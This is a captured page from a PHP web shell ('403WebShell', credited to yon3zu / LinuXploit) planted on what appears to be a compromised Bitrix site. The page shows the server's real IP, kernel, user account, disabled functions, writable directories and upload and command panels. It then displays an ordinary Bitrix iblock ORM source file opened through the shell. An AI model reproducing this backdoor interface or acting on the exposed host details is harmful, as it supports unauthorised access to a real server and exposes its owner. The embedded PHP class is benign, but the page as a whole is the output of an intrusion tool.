%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.15.22.202
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/iblock/lib/orm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/iblock/lib/orm/propertytofield.php
<?php
/**
 * Bitrix Framework
 * @package    bitrix
 * @subpackage iblock
 * @copyright  2001-2018 Bitrix
 */

namespace Bitrix\Iblock\ORM;

use Bitrix\Iblock\Iblock;
use Bitrix\Iblock\Property;
use Bitrix\Iblock\PropertyEnumerationTable;
use Bitrix\Iblock\PropertyTable;
use Bitrix\Iblock\SectionTable;
use Bitrix\Main\FileTable;
use Bitrix\Main\ORM\Entity;
use Bitrix\Main\ORM\Fields\FloatField;
use Bitrix\Main\ORM\Fields\IntegerField;
use Bitrix\Main\ORM\Fields\Relations\Reference;
use Bitrix\Main\ORM\Fields\StringField;
use Bitrix\Main\ORM\Query\Join;

/**
 * Generates entity fields for base types
 *
 * @package    bitrix
 * @subpackage iblock
 */
class PropertyToField
{
	/**
	 * @param Property $property
	 * @param Entity $propertyValueEntity
	 *
	 * @throws \Bitrix\Main\SystemException
	 */
	public static function attachField($property, $propertyValueEntity)
	{
		switch ($property->getPropertyType())
		{
			case PropertyTable::TYPE_STRING:

				$propertyValueEntity->addField(new StringField('VALUE'));
				break;

			case PropertyTable::TYPE_NUMBER:

				$propertyValueEntity->addField(new FloatField('VALUE'));
				break;

			case PropertyTable::TYPE_FILE:

				$propertyValueEntity->addField(new IntegerField('VALUE'));

				// add reference to file
				$propertyValueEntity->addField(new Reference(
					'FILE', FileTable::class,
					Join::on("this.VALUE", 'ref.ID')
				));
				break;

			case PropertyTable::TYPE_ELEMENT:

				$propertyValueEntity->addField(new IntegerField('VALUE'));

				// add reference to element
				$refIblock = Iblock::wakeUp($property->getLinkIblockId());
				$refIblock->fill('API_CODE');

				if($refIblock->getApiCode() <> '')
				{
					$refEntityName = $refIblock->getEntityDataClass();

					$propertyValueEntity->addField(
						new Reference('ELEMENT', $refEntityName, Join::on("this.VALUE", 'ref.ID'))
					);
				}
				break;

			case PropertyTable::TYPE_SECTION:

				$propertyValueEntity->addField(new IntegerField('VALUE'));

				// add reference to section
				$propertyValueEntity->addField(new Reference(
					'SECTION', SectionTable::class,
					Join::on("this.VALUE", 'ref.ID')
				));
				break;

			case PropertyTable::TYPE_LIST:

				$propertyValueEntity->addField(new IntegerField('VALUE'));

				// add reference to list item
				$propertyValueEntity->addField(new Reference(
					'ITEM',
					PropertyEnumerationTable::class,
					Join::on('this.VALUE', 'ref.ID')
				));
				break;
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit